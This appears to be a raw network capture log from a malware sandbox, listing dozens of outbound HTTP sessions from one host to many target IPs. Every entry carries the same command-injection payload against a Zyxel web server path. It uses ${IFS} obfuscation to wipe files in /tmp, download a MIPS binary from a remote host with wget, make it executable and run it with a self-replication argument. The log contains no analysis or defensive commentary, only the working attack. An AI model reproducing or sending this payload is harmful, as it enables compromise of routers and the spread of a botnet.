                                                Jan 12, 2024 18:24:34.807200909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4159192.168.2.1334554187.33.150.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807234049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4160192.168.2.13516568.145.18.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807286024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4161192.168.2.133656284.31.63.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807315111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4162192.168.2.1338114167.72.80.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807357073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4163192.168.2.133281020.130.183.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807396889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4164192.168.2.134272068.162.102.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807425976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4165192.168.2.133553290.176.209.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807478905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4166192.168.2.1333854153.190.210.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807513952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4167192.168.2.1348810101.122.237.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807553053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4168192.168.2.1358576138.108.226.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807604074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4169192.168.2.135727069.19.85.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807626963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4170192.168.2.1357486125.152.197.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807662964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4171192.168.2.134098498.56.94.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807698011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4172192.168.2.1340822122.56.193.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807728052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4173192.168.2.1358790102.11.169.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807766914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4174192.168.2.1341188114.122.55.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807813883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4175192.168.2.134985851.33.245.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807843924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4176192.168.2.134555871.96.236.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807888031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4177192.168.2.135441852.81.225.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807931900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4178192.168.2.1338380172.149.53.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.807974100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4179192.168.2.1345718118.78.209.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808027029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4180192.168.2.1340176123.174.125.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808062077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4181192.168.2.133477446.139.161.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808089018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4182192.168.2.1348658108.190.23.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808160067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4183192.168.2.133969697.68.109.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808181047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4184192.168.2.135528688.130.62.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808217049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4185192.168.2.1358964189.148.174.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808248043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4186192.168.2.13463105.218.106.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808290958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4187192.168.2.1346596113.103.144.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808315992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4188192.168.2.133491447.169.232.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808362007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4189192.168.2.1339536189.121.199.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808389902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4190192.168.2.135047680.254.235.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808432102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4191192.168.2.1345644146.2.154.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808470011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192192.168.2.134583662.134.69.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808509111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4193192.168.2.1343596165.55.178.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808553934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4194192.168.2.1332878154.179.154.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808598042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4195192.168.2.1343370167.248.114.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808636904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4196192.168.2.1344328112.140.143.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808674097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4197192.168.2.1333370138.252.190.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808722973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4198192.168.2.135766234.157.48.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808765888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4199192.168.2.135671242.250.155.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808784008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4200192.168.2.1347526189.95.235.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808840990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4201192.168.2.1355336223.147.124.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808877945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4202192.168.2.1337716141.144.96.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808895111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4203192.168.2.1356296220.4.143.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808947086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4204192.168.2.1360154174.218.200.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.808975935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4205192.168.2.134221285.127.102.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809014082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4206192.168.2.1333850120.81.215.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809042931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4207192.168.2.135475479.89.38.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809094906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4208192.168.2.134740832.171.246.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809137106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4209192.168.2.1335116156.78.155.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809187889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4210192.168.2.1357046219.173.88.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809230089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4211192.168.2.13461608.30.149.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809257984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4212192.168.2.134090052.104.122.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809293032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4213192.168.2.1358920125.234.172.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809326887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4214192.168.2.1342552168.132.143.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809371948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4215192.168.2.1360706211.106.145.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809386969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4216192.168.2.1348718143.16.86.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809407949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4217192.168.2.134879241.91.216.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809470892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4218192.168.2.133476443.75.188.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809509993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4219192.168.2.13434621.178.242.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809551954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4220192.168.2.1353398148.150.166.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809602976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4221192.168.2.1341726167.86.230.135443
                                                TimestampBytes transferredDirectionData
